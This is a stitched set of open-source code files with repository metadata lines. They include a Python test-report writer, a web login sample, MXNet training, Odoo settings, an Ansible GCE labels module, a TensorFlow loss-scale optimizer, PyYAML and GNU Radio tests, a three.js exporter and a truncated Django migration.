reportFile.write(str(total) + "%<br/>")
reportFile.write("Pass: " + str(totalPass) + "<br/>")
reportFile.write("Fail: " + str(totalFail) + "<br/>")
reportFile.write("Total: " + str(totalPass + totalFail) + "<br/>")
# Output the detail table
reportFile.write("<h3>Detailed Results</h3>\n")
reportFile.write("<table border=\"1\">\n")
reportFile.write("<tr><th>Page</th><th>Result</th><th>Pass</th><th>Fail</th><th>Other</th>\n")
for key, value in sorted(alertsPerUrl.iteritems()):
reportFile.write("<tr>")
reportFile.write("<td>" + key + "</td>")
reportFile.write("<td>")
if (len(value.get('pass')) > 0):
reportFile.write("<font style=\"BACKGROUND-COLOR: GREEN\"> PASS </font>")
elif (len(value.get('fail')) > 0):
reportFile.write("<font style=\"BACKGROUND-COLOR: RED\"> FAIL </font>")
elif ('FalsePositive' in key):
reportFile.write("<font style=\"BACKGROUND-COLOR: GREEN\"> PASS </font>")
else:
reportFile.write("<font style=\"BACKGROUND-COLOR: RED\"> FAIL </font>")
reportFile.write("</td>")
reportFile.write("<td>" + " ".join(value.get('pass')) + " </td>")
reportFile.write("<td>" + " ".join(value.get('fail')) + " </td>")
reportFile.write("<td>" + " ".join(value.get('other')) + " </td>")
reportFile.write("</tr>\n")
reportFile.write("</table><br/>\n")
reportFile.write("<h3>Alerts Key</h3>\n")
reportFile.write("<table border=\"1\">\n")
reportFile.write("<tr><th>Alert</th><th>Description</th>\n")
#for key, value in abbrev.items():
for (k, v) in sorted(abbrev.items(), key=lambda (k,v): v):
reportFile.write("<tr>")
reportFile.write("<td>" + v + "</td>")
reportFile.write("<td>" + k + "</td>")
reportFile.write("</tr>\n")
reportFile.write("</table><br/>\n")
reportFile.write("</body></html>\n")
reportFile.close()
#for key, value in sorted(alertsPerUrl.iteritems()):
# print "%s: %s" % (key, value)
#print ''
print ''
print 'Got ' + str(len(alerts)) + ' alerts'
print 'Got ' + str(len(uniqueUrls)) + ' unique urls'
| apache-2.0 | -5,172,537,633,220,105,000 | 36.28169 | 152 | 0.659676 | false |
lujinda/gale | sample/login/run.py | 1 | 1105 | #!/usr/bin/env python
#coding:utf-8
# Author : tuxpy
# Email : [email protected]
# Last modified : 2015-06-09 15:20:13
# Filename : test.py
# Description :
from gale.web import app_run, router, RequestHandler
class BaseHandler(RequestHandler):
def get_current_user(self):
return self.session.get('username')
@router(url = '/login', is_login = True, base_handler = BaseHandler)
def login(self):
self.render('login.html')
@router(url = '/login', method = 'POST', base_handler = BaseHandler)
def login_post(self):
username = self.get_argument('username', '')
if username:
self.session['username'] = username
self.session.save()
callback_url = self.get_query_argument('callback', '/')
self.redirect(callback_url)
@router(url = '/logout', method='GET', base_handler = BaseHandler)
def logout(self):
self.session.pop('username', None)
self.session.save()
self.redirect('/')
@router(url = '/', base_handler = BaseHandler, should_login = True)
def index(self):
self.push('hi ' + self.current_user)
app_run(__file__)
| mit | -7,656,263,590,322,026,000 | 27.333333 | 68 | 0.651584 | false |
jiajiechen/mxnet | example/kaggle-ndsb1/train_dsb.py | 41 | 4039 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import find_mxnet
import mxnet as mx
import logging
import argparse
import train_model
import time
# don't use -n and -s, which are resevered for the distributed training
parser = argparse.ArgumentParser(description='train an image classifer on Kaggle Data Science Bowl 1')
parser.add_argument('--network', type=str, default='dsb',
help = 'the cnn to use')
parser.add_argument('--data-dir', type=str, default="data48/",
help='the input data directory')
parser.add_argument('--save-model-prefix', type=str,default= "./models/sample_net",
help='the prefix of the model to load/save')
parser.add_argument('--lr', type=float, default=.01,
help='the initial learning rate')
parser.add_argument('--lr-factor', type=float, default=1,
help='times the lr with a factor for every lr-factor-epoch epoch')
parser.add_argument('--lr-factor-epoch', type=float, default=15,
help='the number of epoch to factor the lr, could be .5')
parser.add_argument('--clip-gradient', type=float, default=5.,
help='clip min/max gradient to prevent extreme value')
parser.add_argument('--num-epochs', type=int, default=100,
help='the number of training epochs')
parser.add_argument('--load-epoch', type=int,
help="load the model on an epoch using the model-prefix")
parser.add_argument('--batch-size', type=int, default=64,
help='the batch size')
parser.add_argument('--gpus', type=str,
help='the gpus will be used, e.g "0,1,2,3"')
parser.add_argument('--kv-store', type=str, default='local',
help='the kvstore type')
parser.add_argument('--num-examples', type=int, default=20000,
help='the number of training examples')
parser.add_argument('--num-classes', type=int, default=121,
help='the number of classes')
parser.add_argument('--log-file', type=str,
help='the name of log file')
parser.add_argument('--log-dir', type=str, default="/tmp/",
help='directory of the log file')
args = parser.parse_args()
# network
import importlib
net = importlib.import_module('symbol_' + args.network).get_symbol(args.num_classes)
# data
def get_iterator(args, kv):
data_shape = (3, 36, 36)
# train data iterator
train = mx.io.ImageRecordIter(
path_imgrec = args.data_dir + "tr.rec",
mean_r = 128,
mean_g = 128,
mean_b = 128,
scale = 0.0078125,
max_aspect_ratio = 0.35,
data_shape = data_shape,
batch_size = args.batch_size,
rand_crop = True,
rand_mirror = True,
)
# validate data iterator
val = mx.io.ImageRecordIter(
path_imgrec = args.data_dir + "va.rec",
mean_r = 128,
mean_b = 128,
mean_g = 128,
scale = 0.0078125,
rand_crop = False,
rand_mirror = False,
data_shape = data_shape,
batch_size = args.batch_size)
return (train, val)
# train
tic=time.time()
train_model.fit(args, net, get_iterator)
print "time elapsed to train model", time.time()-tic
| apache-2.0 | 1,754,920,422,216,337,200 | 38.990099 | 102 | 0.635553 | false |
levkar/odoo | addons/website_sale/models/res_config.py | 20 | 7095 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, models, fields
class WebsiteConfigSettings(models.TransientModel):
_inherit = 'website.config.settings'
def _default_order_mail_template(self):
if self.env['ir.module.module'].search([('name', '=', 'website_quote')]).state in ('installed', 'to upgrade'):
return self.env.ref('website_quote.confirmation_mail').id
else:
return self.env.ref('sale.email_template_edi_sale').id
salesperson_id = fields.Many2one('res.users', related='website_id.salesperson_id', string='Salesperson')
salesteam_id = fields.Many2one('crm.team', related='website_id.salesteam_id', string='Sales Team')
module_delivery = fields.Boolean("Manage shipping internally")
module_website_sale_delivery = fields.Boolean("Add Delivery Costs to Online Sales")
# field used to have a nice radio in form view, resuming the 2 fields above
sale_delivery_settings = fields.Selection([
('none', 'No shipping management on website'),
('internal', "Delivery methods are only used internally: the customer doesn't pay for shipping costs"),
('website', "Delivery methods are selectable on the website: the customer pays for shipping costs"),
], string="Shipping Management")
module_delivery_dhl = fields.Boolean("DHL integration")
module_delivery_fedex = fields.Boolean("Fedex integration")
module_delivery_temando = fields.Boolean("Temando integration")
module_delivery_ups = fields.Boolean("UPS integration")
module_delivery_usps = fields.Boolean("USPS integration")
module_sale_ebay = fields.Boolean("eBay connector")
group_website_multiimage = fields.Selection([
(0, 'One image per product'),
(1, 'Several images per product')
], string='Multi Images', implied_group='website_sale.group_website_multi_image', group='base.group_portal,base.group_user,base.group_public')
module_website_sale_options = fields.Selection([
(0, 'One-step "add to cart"'),
(1, 'Suggest optional products when adding to cart (e.g. for a computer: warranty, software, etc.)')
], "Optional Products", help='Installs *e-Commerce Optional Products*')
module_portal = fields.Boolean("Activate the customer portal", help="""Give your customers access to their documents.""")
# the next 2 fields represent sale_pricelist_setting from sale.config.settings, they are split here for the form view, to improve usability
sale_pricelist_setting_split_1 = fields.Selection([
(0, 'A single sales price per product'),
(1, 'Several prices selectable through a drop-down list or applied automatically via Geo-IP'),
], default=0, string="Pricing Strategy")
sale_pricelist_setting_split_2 = fields.Selection([
(0, 'Specific prices per customer segment, currency, etc.'),
(1, 'Advanced pricing based on formulas (discounts, margins, rounding)')
], default=0, string="Sales Price",
help='Specific prices per customer segment, currency, etc.: new pricing table available in product detail form (Sales tab).\n'
'Advanced pricing based on formulas (discounts, margins, rounding): apply price rules from a new *Pricelists* menu in Configuration.')
group_sale_pricelist = fields.Boolean("Use pricelists to adapt your price per customers",
implied_group='product.group_sale_pricelist',
help="""Allows to manage different prices based on rules per category of customers.
Example: 10% for retailers, promotion of 5 EUR on this product, etc.""")
group_pricelist_item = fields.Boolean("Show pricelists to customers",
implied_group='product.group_pricelist_item')
group_product_pricelist = fields.Boolean("Show pricelists On Products",
implied_group='product.group_product_pricelist')
order_mail_template = fields.Many2one('mail.template', string='Order Confirmation Email', readonly=True, default=_default_order_mail_template, help="Email sent to customer at the end of the checkout process")
@api.model
def get_default_sale_delivery_settings(self, fields):
sale_delivery_settings = 'none'
if self.env['ir.module.module'].search([('name', '=', 'delivery')], limit=1).state in ('installed', 'to install', 'to upgrade'):
sale_delivery_settings = 'internal'
if self.env['ir.module.module'].search([('name', '=', 'website_sale_delivery')], limit=1).state in ('installed', 'to install', 'to upgrade'):
sale_delivery_settings = 'website'
return {'sale_delivery_settings': sale_delivery_settings}
@api.model
def get_default_sale_pricelist_setting(self, fields):
return {'sale_pricelist_setting_split_1': 0 if self.env['ir.values'].get_defaults_dict('sale.config.settings').get('sale_pricelist_setting', 'fixed') == 'fixed' else 1,
'sale_pricelist_setting_split_2': 0 if self.env['ir.values'].get_defaults_dict('sale.config.settings').get('sale_pricelist_setting', 'fixed') != 'formula' else 1}
@api.model
def set_sale_pricelist_settings(self):
sale_pricelist_setting = 'formula'
if self.sale_pricelist_setting_split_1 == 0:
sale_pricelist_setting = 'fixed'
elif self.sale_pricelist_setting_split_2 == 0:
sale_pricelist_setting = 'percentage'
return self.env['ir.values'].sudo().set_default(
'sale.config.settings', 'sale_pricelist_setting', sale_pricelist_setting)
@api.onchange('sale_delivery_settings')
def _onchange_sale_delivery_settings(self):
if self.sale_delivery_settings == 'none':
self.update({
'module_delivery': False,
'module_website_sale_delivery': False,
})
elif self.sale_delivery_settings == 'internal':
self.update({
'module_delivery': True,
'module_website_sale_delivery': False,
})
else:
self.update({
'module_delivery': True,
'module_website_sale_delivery': True,
})
@api.onchange('sale_pricelist_setting_split_1', 'sale_pricelist_setting_split_2')
def _onchange_sale_pricelist_setting(self):
if self.sale_pricelist_setting_split_1 == 0:
self.update({
'group_product_pricelist': False,
'group_sale_pricelist': False,
'group_pricelist_item': False,
})
else:
if self.sale_pricelist_setting_split_2 == 0:
self.update({
'group_product_pricelist': True,
'group_sale_pricelist': True,
'group_pricelist_item': False,
})
else:
self.update({
'group_product_pricelist': False,
'group_sale_pricelist': True,
'group_pricelist_item': True,
})
| agpl-3.0 | 6,818,163,870,383,461,000 | 56.217742 | 212 | 0.643693 | false |
Jorge-Rodriguez/ansible | lib/ansible/modules/cloud/google/gce_labels.py | 104 | 12673 | #!/usr/bin/python
# Copyright 2017 Google Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gce_labels
version_added: '2.4'
short_description: Create, Update or Destroy GCE Labels.
description:
- Create, Update or Destroy GCE Labels on instances, disks, snapshots, etc.
When specifying the GCE resource, users may specifiy the full URL for
the resource (its 'self_link'), or the individual parameters of the
resource (type, location, name). Examples for the two options can be
seen in the documentaion.
See U(https://cloud.google.com/compute/docs/label-or-tag-resources) for
more information about GCE Labels. Labels are gradually being added to
more GCE resources, so this module will need to be updated as new
resources are added to the GCE (v1) API.
requirements:
- 'python >= 2.6'
- 'google-api-python-client >= 1.6.2'
- 'google-auth >= 1.0.0'
- 'google-auth-httplib2 >= 0.0.2'
notes:
- Labels support resources such as instances, disks, images, etc. See
U(https://cloud.google.com/compute/docs/labeling-resources) for the list
of resources available in the GCE v1 API (not alpha or beta).
author:
- 'Eric Johnson (@erjohnso) <[email protected]>'
options:
labels:
description:
- A list of labels (key/value pairs) to add or remove for the resource.
required: false
resource_url:
description:
- The 'self_link' for the resource (instance, disk, snapshot, etc)
required: false
resource_type:
description:
- The type of resource (instances, disks, snapshots, images)
required: false
resource_location:
description:
- The location of resource (global, us-central1-f, etc.)
required: false
resource_name:
description:
- The name of resource.
required: false
'''
EXAMPLES = '''
- name: Add labels on an existing instance (using resource_url)
gce_labels:
service_account_email: "{{ service_account_email }}"
credentials_file: "{{ credentials_file }}"
project_id: "{{ project_id }}"
labels:
webserver-frontend: homepage
environment: test
experiment-name: kennedy
resource_url: https://www.googleapis.com/compute/beta/projects/myproject/zones/us-central1-f/instances/example-instance
state: present
- name: Add labels on an image (using resource params)
gce_labels:
service_account_email: "{{ service_account_email }}"
credentials_file: "{{ credentials_file }}"
project_id: "{{ project_id }}"
labels:
webserver-frontend: homepage
environment: test
experiment-name: kennedy
resource_type: images
resource_location: global
resource_name: my-custom-image
state: present
- name: Remove specified labels from the GCE instance
gce_labels:
service_account_email: "{{ service_account_email }}"
credentials_file: "{{ credentials_file }}"
project_id: "{{ project_id }}"
labels:
environment: prod
experiment-name: kennedy
resource_url: https://www.googleapis.com/compute/beta/projects/myproject/zones/us-central1-f/instances/example-instance
state: absent
'''
RETURN = '''
labels:
description: List of labels that exist on the resource.
returned: Always.
type: dict
sample: [ { 'webserver-frontend': 'homepage', 'environment': 'test', 'environment-name': 'kennedy' } ]
resource_url:
description: The 'self_link' of the GCE resource.
returned: Always.
type: str
sample: 'https://www.googleapis.com/compute/beta/projects/myproject/zones/us-central1-f/instances/example-instance'
resource_type:
description: The type of the GCE resource.
returned: Always.
type: str
sample: instances
resource_location:
description: The location of the GCE resource.
returned: Always.
type: str
sample: us-central1-f
resource_name:
description: The name of the GCE resource.
returned: Always.
type: str
sample: my-happy-little-instance
state:
description: state of the labels
returned: Always.
type: str
sample: present
'''
try:
from ast import literal_eval
HAS_PYTHON26 = True
except ImportError:
HAS_PYTHON26 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.gcp import check_params, get_google_api_client, GCPUtils
UA_PRODUCT = 'ansible-gce_labels'
UA_VERSION = '0.0.1'
GCE_API_VERSION = 'v1'
# TODO(all): As Labels are added to more GCE resources, this list will need to
# be updated (along with some code changes below). The list can *only* include
# resources from the 'v1' GCE API and will *not* work with 'beta' or 'alpha'.
KNOWN_RESOURCES = ['instances', 'disks', 'snapshots', 'images']
def _fetch_resource(client, module):
params = module.params
if params['resource_url']:
if not params['resource_url'].startswith('https://www.googleapis.com/compute'):
module.fail_json(
msg='Invalid self_link url: %s' % params['resource_url'])
else:
parts = params['resource_url'].split('/')[8:]
if len(parts) == 2:
resource_type, resource_name = parts
resource_location = 'global'
else:
resource_location, resource_type, resource_name = parts
else:
if not params['resource_type'] or not params['resource_location'] \
or not params['resource_name']:
module.fail_json(msg='Missing required resource params.')
resource_type = params['resource_type'].lower()
resource_name = params['resource_name'].lower()
resource_location = params['resource_location'].lower()
if resource_type not in KNOWN_RESOURCES:
module.fail_json(msg='Unsupported resource_type: %s' % resource_type)
# TODO(all): See the comment above for KNOWN_RESOURCES. As labels are
# added to the v1 GCE API for more resources, some minor code work will
# need to be added here.
if resource_type == 'instances':
resource = client.instances().get(project=params['project_id'],
zone=resource_location,
instance=resource_name).execute()
elif resource_type == 'disks':
resource = client.disks().get(project=params['project_id'],
zone=resource_location,
disk=resource_name).execute()
elif resource_type == 'snapshots':
resource = client.snapshots().get(project=params['project_id'],
snapshot=resource_name).execute()
elif resource_type == 'images':
resource = client.images().get(project=params['project_id'],
image=resource_name).execute()
else:
module.fail_json(msg='Unsupported resource type: %s' % resource_type)
return resource.get('labelFingerprint', ''), {
'resource_name': resource.get('name'),
'resource_url': resource.get('selfLink'),
'resource_type': resource_type,
'resource_location': resource_location,
'labels': resource.get('labels', {})
}
def _set_labels(client, new_labels, module, ri, fingerprint):
params = module.params
result = err = None
labels = {
'labels': new_labels,
'labelFingerprint': fingerprint
}
# TODO(all): See the comment above for KNOWN_RESOURCES. As labels are
# added to the v1 GCE API for more resources, some minor code work will
# need to be added here.
if ri['resource_type'] == 'instances':
req = client.instances().setLabels(project=params['project_id'],
instance=ri['resource_name'],
zone=ri['resource_location'],
body=labels)
elif ri['resource_type'] == 'disks':
req = client.disks().setLabels(project=params['project_id'],
zone=ri['resource_location'],
resource=ri['resource_name'],
body=labels)
elif ri['resource_type'] == 'snapshots':
req = client.snapshots().setLabels(project=params['project_id'],
resource=ri['resource_name'],
body=labels)
elif ri['resource_type'] == 'images':
req = client.images().setLabels(project=params['project_id'],
resource=ri['resource_name'],
body=labels)
else:
module.fail_json(msg='Unsupported resource type: %s' % ri['resource_type'])
# TODO(erjohnso): Once Labels goes GA, we'll be able to use the GCPUtils
# method to poll for the async request/operation to complete before
# returning. However, during 'beta', we are in an odd state where
# API requests must be sent to the 'compute/beta' API, but the python
# client library only allows for *Operations.get() requests to be
# sent to 'compute/v1' API. The response operation is in the 'beta'
# API-scope, but the client library cannot find the operation (404).
# result = GCPUtils.execute_api_client_req(req, client=client, raw=False)
# return result, err
result = req.execute()
return True, err
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(choices=['absent', 'present'], default='present'),
service_account_email=dict(),
service_account_permissions=dict(type='list'),
pem_file=dict(),
credentials_file=dict(),
labels=dict(required=False, type='dict', default={}),
resource_url=dict(required=False, type='str'),
resource_name=dict(required=False, type='str'),
resource_location=dict(required=False, type='str'),
resource_type=dict(required=False, type='str'),
project_id=dict()
),
required_together=[
['resource_name', 'resource_location', 'resource_type']
],
mutually_exclusive=[
['resource_url', 'resource_name'],
['resource_url', 'resource_location'],
['resource_url', 'resource_type']
]
)
if not HAS_PYTHON26:
module.fail_json(
msg="GCE module requires python's 'ast' module, python v2.6+")
client, cparams = get_google_api_client(module, 'compute',
user_agent_product=UA_PRODUCT,
user_agent_version=UA_VERSION,
api_version=GCE_API_VERSION)
# Get current resource info including labelFingerprint
fingerprint, resource_info = _fetch_resource(client, module)
new_labels = resource_info['labels'].copy()
update_needed = False
if module.params['state'] == 'absent':
for k, v in module.params['labels'].items():
if k in new_labels:
if new_labels[k] == v:
update_needed = True
new_labels.pop(k, None)
else:
module.fail_json(msg="Could not remove unmatched label pair '%s':'%s'" % (k, v))
else:
for k, v in module.params['labels'].items():
if k not in new_labels:
update_needed = True
new_labels[k] = v
changed = False
json_output = {'state': module.params['state']}
if update_needed:
changed, err = _set_labels(client, new_labels, module, resource_info,
fingerprint)
json_output['changed'] = changed
# TODO(erjohnso): probably want to re-fetch the resource to return the
# new labelFingerprint, check that desired labels match updated labels.
# BUT! Will need to wait for setLabels() to hit v1 API so we can use the
# GCPUtils feature to poll for the operation to be complete. For now,
# we'll just update the output with what we have from the original
# state of the resource.
json_output.update(resource_info)
json_output.update(module.params)
module.exit_json(**json_output)
if __name__ == '__main__':
main()
| gpl-3.0 | -2,670,281,631,069,084,700 | 38.114198 | 123 | 0.609011 | false |
alshedivat/tensorflow | tensorflow/contrib/mixed_precision/python/loss_scale_optimizer.py | 20 | 6862 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Loss scaling optimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import context
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.training import optimizer
class LossScaleOptimizer(optimizer.Optimizer):
# TODO(jamesqin): move mixed precision training explanation to __init__
# docstring.
"""An optimizer that applies loss scaling in backprop.
This class is useful for "mixed precision training" on GPUs (or other
potential accelerators), an approach to improve compute throughput without
compromising model quality.
The canonical way to perform mixed precision training is the following:
* Model variables are kept in high precision (e.g. float32).
* Computations are done in lower precision (e.g. float16), which enjoys
performance speedup by virtue of hardware support. Variables are casted to
lower precision before they're used.
* Final gradients are casted back to high precision dtype, then used to update
variables.
The side-effect of performing computation in lower precision, is that it comes
with smaller numerical range. During backproping, small gradients might
underflow in the reduced numerical range, causing a model to converge at
suboptimal level.
To prevent underflow, this optimizer multiplies the loss by a factor before
backprop starts. Consequently, the gradients are linearly scaled up by the
same factor, thus not falling into the underflow zone. After that, to perserve
the correctness of backprop, the gradients are down-scaled by the same factor,
casted to the (higher) variable precision, then applied on the variables.
See [Nvidia's manual on mixed precision training](
https://docs.nvidia.com/deeplearning/sdk/mixed-precision-training/index.html)
for more details.
To use loss scale optimizer, one only needs choose a loss scale strategy and
wrap a regular optimizer. See examples below.
```
loss = loss_fn()
opt = tf.AdamOptimizer(learning_rate=...)
# Choose a loss scale manager which decides how to pick the right loss scale
# throughout the training process.
loss_scale_manager = tf.contrib.mixed_precision.FixedLossScaleManager(5000)
# Wraps the original optimizer in a LossScaleOptimizer.
loss_scale_optimizer =
tf.contrib.mixed_precision.LossScaleOptimizer(opt, loss_scale_manager)
# Call minimize() on the loss scale optimizer.
train_op = loss_scale_optimizer.minimize(loss)
```
If gradients clipping is applied, one can call
`optimizer.compute_gradients()` and `optimizer.apply_gradients()`
separately.
Notice the following way of using LossScaleOptimizer is not intended. Always
use `loss_scale_optimizer.compute_gradients()` to compute gradients instead of
`tf.gradients()` if doing mixed precision training.
```
# The following is a wrong way to use LossScaleOptimizer along with
# tf.gradients().
# Always use loss_scale_optimizer.compute_gradients() to compute grads, or
# loss scale is not correctly applied.
grads = tf.gradients(loss, ...)
# Do some custom grad clipping.
grads = clip_grads(grads, ...)
loss_scale_optimizer.apply(grads_and_vars)
```
"""
def __init__(self, opt, loss_scale_manager):
"""Construct a loss scaling optimizer.
Args:
opt: The actual optimizer that will be used to compute and apply the
gradients. Must be an implementation of the `tf.train.Optimizer`
interface.
loss_scale_manager: A LossScaleManager object.
"""
self._opt = opt
self._loss_scale_manager = loss_scale_manager
def compute_gradients(self,
loss,
var_list=None,
gate_gradients=optimizer.Optimizer.GATE_OP,
aggregation_method=None,
colocate_gradients_with_ops=False,
grad_loss=None):
"""Compute gradients. See base class `tf.train.Optimizer`."""
loss_scale = self._loss_scale_manager.get_loss_scale()
if context.executing_eagerly():
def scaled_loss():
loss_val = loss()
return loss_val * math_ops.cast(loss_scale, loss_val.dtype.base_dtype)
else:
if callable(loss):
loss_val = loss()
else:
loss_val = loss
scaled_loss = loss_val * math_ops.cast(loss_scale,
loss_val.dtype.base_dtype)
grads_and_vars = self._opt.compute_gradients(
scaled_loss,
var_list=var_list,
gate_gradients=gate_gradients,
aggregation_method=aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
grad_loss=grad_loss)
return self._down_scale(grads_and_vars, loss_scale)
def apply_gradients(self, grads_and_vars, global_step=None, name=None):
"""Apply gradients. See base class `tf.train.Optimizer`."""
grads = [g for (g, _) in grads_and_vars]
is_finite_grad = []
for g in grads:
is_finite_grad.append(math_ops.reduce_all(gen_math_ops.is_finite(g)))
is_overall_finite = math_ops.reduce_all(is_finite_grad)
# Only update gradients when all grads are finite.
def true_apply_gradients_fn():
return self._opt.apply_gradients(grads_and_vars, global_step, name)
update_vars = control_flow_ops.cond(
is_overall_finite, true_apply_gradients_fn, gen_control_flow_ops.no_op)
# Potentially adjust gradient scale in case of finite gradients.
return control_flow_ops.group(
update_vars,
self._loss_scale_manager.update_loss_scale(is_overall_finite))
def _down_scale(self, grads_vars, loss_scale):
# Down scale grads by the loss_scale.
gv = []
inv_loss_scale = gen_math_ops.reciprocal(loss_scale)
for g, v in grads_vars:
if g is not None:
gv.append((g * math_ops.cast(inv_loss_scale, g.dtype.base_dtype), v))
else:
gv.append((g, v))
return gv
| apache-2.0 | -513,078,801,232,219,000 | 38.66474 | 80 | 0.694404 | false |
keedio/hue | desktop/core/ext-py/PyYAML-3.09/tests/lib/test_canonical.py | 60 | 1135 |
import yaml, canonical
def test_canonical_scanner(canonical_filename, verbose=False):
data = open(canonical_filename, 'rb').read()
tokens = list(yaml.canonical_scan(data))
assert tokens, tokens
if verbose:
for token in tokens:
print token
test_canonical_scanner.unittest = ['.canonical']
def test_canonical_parser(canonical_filename, verbose=False):
data = open(canonical_filename, 'rb').read()
events = list(yaml.canonical_parse(data))
assert events, events
if verbose:
for event in events:
print event
test_canonical_parser.unittest = ['.canonical']
def test_canonical_error(data_filename, canonical_filename, verbose=False):
data = open(data_filename, 'rb').read()
try:
output = list(yaml.canonical_load_all(data))
except yaml.YAMLError, exc:
if verbose:
print exc
else:
raise AssertionError("expected an exception")
test_canonical_error.unittest = ['.data', '.canonical']
test_canonical_error.skip = ['.empty']
if __name__ == '__main__':
import test_appliance
test_appliance.run(globals())
| apache-2.0 | -4,266,917,524,867,631,000 | 27.375 | 75 | 0.660793 | false |
Leeft/three.js | utils/exporters/blender/addons/io_three/exporter/io.py | 201 | 2836 | import os
import shutil
from .. import constants, logger
from . import _json
def copy_registered_textures(dest, registration):
"""Copy the registered textures to the destination (root) path
:param dest: destination directory
:param registration: registered textures
:type dest: str
:type registration: dict
"""
logger.debug("io.copy_registered_textures(%s, %s)", dest, registration)
os.makedirs(dest, exist_ok=True)
for value in registration.values():
copy(value['file_path'], dest)
def copy(src, dst):
"""Copy a file to a destination
:param src: source file
:param dst: destination file/path
"""
logger.debug("io.copy(%s, %s)" % (src, dst))
if os.path.isdir(dst):
file_name = os.path.basename(src)
dst = os.path.join(dst, file_name)
if src != dst:
shutil.copy(src, dst)
def dump(filepath, data, options=None):
"""Dump the output to disk (JSON, msgpack, etc)
:param filepath: output file path
:param data: serializable data to write to disk
:param options: (Default value = None)
:type options: dict
"""
options = options or {}
logger.debug("io.dump(%s, data, options=%s)", filepath, options)
compress = options.get(constants.COMPRESSION, constants.NONE)
if compress == constants.MSGPACK:
try:
import msgpack
except ImportError:
logger.error("msgpack module not found")
raise
logger.info("Dumping to msgpack")
func = lambda x, y: msgpack.dump(x, y)
mode = 'wb'
else:
round_off = options.get(constants.ENABLE_PRECISION)
if round_off:
_json.ROUND = options[constants.PRECISION]
else:
_json.ROUND = None
indent = options.get(constants.INDENT, True)
indent = 4 if indent else None
logger.info("Dumping to JSON")
func = lambda x, y: _json.json.dump(x, y, indent=indent)
mode = 'w'
logger.info("Writing to %s", filepath)
with open(filepath, mode=mode) as stream:
func(data, stream)
def load(filepath, options):
"""Load the contents of the file path with the correct parser
:param filepath: input file path
:param options:
:type options: dict
"""
logger.debug("io.load(%s, %s)", filepath, options)
compress = options.get(constants.COMPRESSION, constants.NONE)
if compress == constants.MSGPACK:
try:
import msgpack
except ImportError:
logger.error("msgpack module not found")
raise
module = msgpack
mode = 'rb'
else:
logger.info("Loading JSON")
module = _json.json
mode = 'r'
with open(filepath, mode=mode) as stream:
data = module.load(stream)
return data
| mit | -6,637,956,004,533,076,000 | 26.009524 | 75 | 0.61213 | false |
michaelld/gnuradio | gr-blocks/python/blocks/qa_unpack_k_bits.py | 7 | 1845 | #!/usr/bin/env python
#
# Copyright 2006,2010,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest, blocks
import random
class test_unpack(gr_unittest.TestCase):
def setUp(self):
random.seed(0)
self.tb = gr.top_block ()
def tearDown(self):
self.tb = None
def test_001(self):
src_data = (1,0,1,1,0,1,1,0)
expected_results = (1,0,1,1,0,1,1,0)
src = blocks.vector_source_b(src_data,False)
op = blocks.unpack_k_bits_bb(1)
dst = blocks.vector_sink_b()
self.tb.connect(src, op, dst)
self.tb.run()
self.assertEqual(expected_results, dst.data())
def test_002(self):
src_data = ( 2, 3, 0, 1)
expected_results = (1,0,1,1,0,0,0,1)
src = blocks.vector_source_b(src_data,False)
op = blocks.unpack_k_bits_bb(2)
dst = blocks.vector_sink_b()
self.tb.connect(src, op, dst)
self.tb.run()
self.assertEqual(expected_results, dst.data())
if __name__ == '__main__':
gr_unittest.run(test_unpack, "test_unpack.xml")
| gpl-3.0 | -7,482,672,415,865,631,000 | 30.271186 | 70 | 0.645528 | false |
lucidmotifs/codenamev | mediaplayer/migrations/0002_auto_20150211_0549.py | 1 | 4196 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('mediaplayer', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Channel',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=100)),
('description', models.CharField(max_length=255)),
('created', models.DateTimeField(verbose_name=b'Date Created')),
('modified', models.DateTimeField(verbose_name=b'Date Modified')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
